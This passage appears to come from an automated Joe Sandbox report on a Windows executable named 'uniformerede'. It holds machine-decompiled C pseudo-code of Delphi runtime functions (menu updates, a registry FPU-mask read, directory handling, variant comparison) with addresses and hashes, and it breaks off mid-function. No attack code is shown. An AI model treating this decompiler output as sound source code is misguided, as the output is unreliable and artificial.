                                                                                                                                                                                                                            0x004257ca
                                                                                                                                                                                                                            0x004257cf
                                                                                                                                                                                                                            0x004257d3
                                                                                                                                                                                                                            0x004257d5
                                                                                                                                                                                                                            0x004257da
                                                                                                                                                                                                                            0x004257e1
                                                                                                                                                                                                                            0x004257e9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(vas,00428B00,?,00000001,00428C96,?,?,?,00429F01,?,?,00429D20,?,0000000E,00000000,?), ref: 0042574C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                                                                                                            • String ID: h7B$h8B$vas$5B
                                                                                                                                                                                                                            • API String ID: 32694325-2931570110
                                                                                                                                                                                                                            • Opcode ID: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                                                                                                                                                                                            • Instruction ID: 3f3694d375962d4255fc29ac861639cc4656e31162b1a28f9c4b0cd7577d53a2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9118EB1A01B129FC320EF2AE840985FBF9BF84314384853FE449C7B11D779A9558B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0044E150(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49de44; // 0x49e744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044E4D4(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                                                                                                                                                                            0x0044e152
                                                                                                                                                                                                                            0x0044e155
                                                                                                                                                                                                                            0x0044e157
                                                                                                                                                                                                                            0x0044e160
                                                                                                                                                                                                                            0x0044e177
                                                                                                                                                                                                                            0x0044e179
                                                                                                                                                                                                                            0x0044e180
                                                                                                                                                                                                                            0x0044e18c
                                                                                                                                                                                                                            0x0044e190
                                                                                                                                                                                                                            0x0044e19e
                                                                                                                                                                                                                            0x0044e1a5
                                                                                                                                                                                                                            0x0044e1a9
                                                                                                                                                                                                                            0x0044e1bb
                                                                                                                                                                                                                            0x0044e1c0
                                                                                                                                                                                                                            0x0044e1de
                                                                                                                                                                                                                            0x0044e1e2
                                                                                                                                                                                                                            0x0044e1f0
                                                                                                                                                                                                                            0x0044e1f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e1fd
                                                                                                                                                                                                                            0x0044e1f7
                                                                                                                                                                                                                            0x0044e1c0
                                                                                                                                                                                                                            0x0044e1a5
                                                                                                                                                                                                                            0x0044e20a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                                                                                                                                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                                                                                                                                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                            • String ID: DI$P
                                                                                                                                                                                                                            • API String ID: 3227129158-1383934172
                                                                                                                                                                                                                            • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00403A5C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E00403A5C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x49b024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x49b024; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x49b024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403ACD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403ad4);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                                                                                                                            0x00403a5d
                                                                                                                                                                                                                            0x00403a5f
                                                                                                                                                                                                                            0x00403a69
                                                                                                                                                                                                                            0x00403a85
                                                                                                                                                                                                                            0x00403ad4
                                                                                                                                                                                                                            0x00403ae6
                                                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                                                            0x00403af2
                                                                                                                                                                                                                            0x00403a87
                                                                                                                                                                                                                            0x00403a89
                                                                                                                                                                                                                            0x00403a8a
                                                                                                                                                                                                                            0x00403a8f
                                                                                                                                                                                                                            0x00403a92
                                                                                                                                                                                                                            0x00403a95
                                                                                                                                                                                                                            0x00403ab1
                                                                                                                                                                                                                            0x00403ab8
                                                                                                                                                                                                                            0x00403abb
                                                                                                                                                                                                                            0x00403abe
                                                                                                                                                                                                                            0x00403acc
                                                                                                                                                                                                                            0x00403acc

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                            • Opcode ID: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                                                            • Instruction ID: 51662933c9f6040cf9cf53aa0deae1acaa2dd39dd85ca193a1d107641bf38472
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0801B575A10208BAEB11DFD1DD02BBEB7ACEB08B01F100077BA14F25D0E6786A10CB5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                                                                                                                                                                                            0x0040294c
                                                                                                                                                                                                                            0x0040294e
                                                                                                                                                                                                                            0x00402952
                                                                                                                                                                                                                            0x0040295c
                                                                                                                                                                                                                            0x0040295f
                                                                                                                                                                                                                            0x00402964
                                                                                                                                                                                                                            0x00402976
                                                                                                                                                                                                                            0x0040297c
                                                                                                                                                                                                                            0x0040297c
                                                                                                                                                                                                                            0x0040298b
                                                                                                                                                                                                                            0x00402992
                                                                                                                                                                                                                            0x0040299c
                                                                                                                                                                                                                            0x0040299c
                                                                                                                                                                                                                            0x004029b9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                                                                                                                                                                                            • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004166D4 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E0041713C(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t268);
													}
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x416ae8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t278);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x416ae8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t289);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}























                                                                                                                                                                                                                            0x004166d4
                                                                                                                                                                                                                            0x004166d5
                                                                                                                                                                                                                            0x004166d7
                                                                                                                                                                                                                            0x004166dc
                                                                                                                                                                                                                            0x004166df
                                                                                                                                                                                                                            0x004166e2
                                                                                                                                                                                                                            0x004166e4
                                                                                                                                                                                                                            0x004166e8
                                                                                                                                                                                                                            0x004166f5
                                                                                                                                                                                                                            0x00416877
                                                                                                                                                                                                                            0x0041687d
                                                                                                                                                                                                                            0x00416897
                                                                                                                                                                                                                            0x004168b9
                                                                                                                                                                                                                            0x004168c8
                                                                                                                                                                                                                            0x004168db
                                                                                                                                                                                                                            0x00416991
                                                                                                                                                                                                                            0x0041699e
                                                                                                                                                                                                                            0x00416a15
                                                                                                                                                                                                                            0x00416a24
                                                                                                                                                                                                                            0x00416a36
                                                                                                                                                                                                                            0x00416ae3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a3c
                                                                                                                                                                                                                            0x00416a43
                                                                                                                                                                                                                            0x00416ade
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a45
                                                                                                                                                                                                                            0x00416a48
                                                                                                                                                                                                                            0x00416a49
                                                                                                                                                                                                                            0x00416a50
                                                                                                                                                                                                                            0x00416a51
                                                                                                                                                                                                                            0x00416a56
                                                                                                                                                                                                                            0x00416a59
                                                                                                                                                                                                                            0x00416a5c
                                                                                                                                                                                                                            0x00416a65
                                                                                                                                                                                                                            0x00416a72
                                                                                                                                                                                                                            0x00416a74
                                                                                                                                                                                                                            0x00416a74
                                                                                                                                                                                                                            0x00416a9c
                                                                                                                                                                                                                            0x00416aa1
                                                                                                                                                                                                                            0x00416aa4
                                                                                                                                                                                                                            0x00416aa7
                                                                                                                                                                                                                            0x00416ab4
                                                                                                                                                                                                                            0x00416ab4
                                                                                                                                                                                                                            0x00416a43
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x004169a0
                                                                                                                                                                                                                            0x004169a3
                                                                                                                                                                                                                            0x004169a4
                                                                                                                                                                                                                            0x004169ab
                                                                                                                                                                                                                            0x004169ac
                                                                                                                                                                                                                            0x004169b1
                                                                                                                                                                                                                            0x004169b4
                                                                                                                                                                                                                            0x004169ba
                                                                                                                                                                                                                            0x004169c2
                                                                                                                                                                                                                            0x004169d1
                                                                                                                                                                                                                            0x004169d3
                                                                                                                                                                                                                            0x004169d3
                                                                                                                                                                                                                            0x004169e6
                                                                                                                                                                                                                            0x004169eb
                                                                                                                                                                                                                            0x004169ee
                                                                                                                                                                                                                            0x004169f1
                                                                                                                                                                                                                            0x004169fe
                                                                                                                                                                                                                            0x004169fe
                                                                                                                                                                                                                            0x004168e1
                                                                                                                                                                                                                            0x004168eb
                                                                                                                                                                                                                            0x00416986
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168ed
                                                                                                                                                                                                                            0x004168f0
                                                                                                                                                                                                                            0x004168f1
                                                                                                                                                                                                                            0x004168f8
                                                                                                                                                                                                                            0x004168f9
                                                                                                                                                                                                                            0x004168fe
                                                                                                                                                                                                                            0x00416901
                                                                                                                                                                                                                            0x00416904
                                                                                                                                                                                                                            0x0041690e
                                                                                                                                                                                                                            0x0041691b
                                                                                                                                                                                                                            0x0041691d
                                                                                                                                                                                                                            0x0041691d
                                                                                                                                                                                                                            0x00416944
                                                                                                                                                                                                                            0x00416949
                                                                                                                                                                                                                            0x0041694c
                                                                                                                                                                                                                            0x0041694f
                                                                                                                                                                                                                            0x0041695c
                                                                                                                                                                                                                            0x0041695c
                                                                                                                                                                                                                            0x004168eb
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x00416899
                                                                                                                                                                                                                            0x004168a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168a5
                                                                                                                                                                                                                            0x0041687f
                                                                                                                                                                                                                            0x00416888
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416888
                                                                                                                                                                                                                            0x004166fb
                                                                                                                                                                                                                            0x004166fe
                                                                                                                                                                                                                            0x00416715
                                                                                                                                                                                                                            0x0041673b
                                                                                                                                                                                                                            0x0041674a
                                                                                                                                                                                                                            0x0041675c
                                                                                                                                                                                                                            0x00416813
                                                                                                                                                                                                                            0x00416814
                                                                                                                                                                                                                            0x0041681b
                                                                                                                                                                                                                            0x0041681c
                                                                                                                                                                                                                            0x00416821
                                                                                                                                                                                                                            0x00416824
                                                                                                                                                                                                                            0x00416827
                                                                                                                                                                                                                            0x00416830
                                                                                                                                                                                                                            0x00416840
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416854
                                                                                                                                                                                                                            0x00416859
                                                                                                                                                                                                                            0x0041685c
                                                                                                                                                                                                                            0x0041685f
                                                                                                                                                                                                                            0x0041686c
                                                                                                                                                                                                                            0x00416762
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x00416808
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041676b
                                                                                                                                                                                                                            0x0041676e
                                                                                                                                                                                                                            0x0041676f
                                                                                                                                                                                                                            0x00416776
                                                                                                                                                                                                                            0x00416777
                                                                                                                                                                                                                            0x0041677c
                                                                                                                                                                                                                            0x0041677f
                                                                                                                                                                                                                            0x00416782
                                                                                                                                                                                                                            0x0041678b
                                                                                                                                                                                                                            0x0041679c
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x004167c6
                                                                                                                                                                                                                            0x004167cb
                                                                                                                                                                                                                            0x004167ce
                                                                                                                                                                                                                            0x004167d1
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00416717
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00416700
                                                                                                                                                                                                                            0x00416709
                                                                                                                                                                                                                            0x00416ae8
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x004166fe

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                                                                                                                                                                                            • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00415454 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* __ebp;
				void* _t119;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr _t250;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t264;
				intOrPtr _t268;
				void* _t271;
				void* _t273;
				intOrPtr _t274;

				_t278 = __fp0;
				_t269 = __edi;
				_t271 = _t273;
				_t274 = _t273 + 0xffffffd8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t204 =  *_v8;
				if(( *_v8 & 0x00000fff) >= 0x10f) {
					if(E0041713C(_t204,  &_v24) == 0) {
						E0041024C(__ecx);
					}
					_push( &_v20);
					_t216 = _v16;
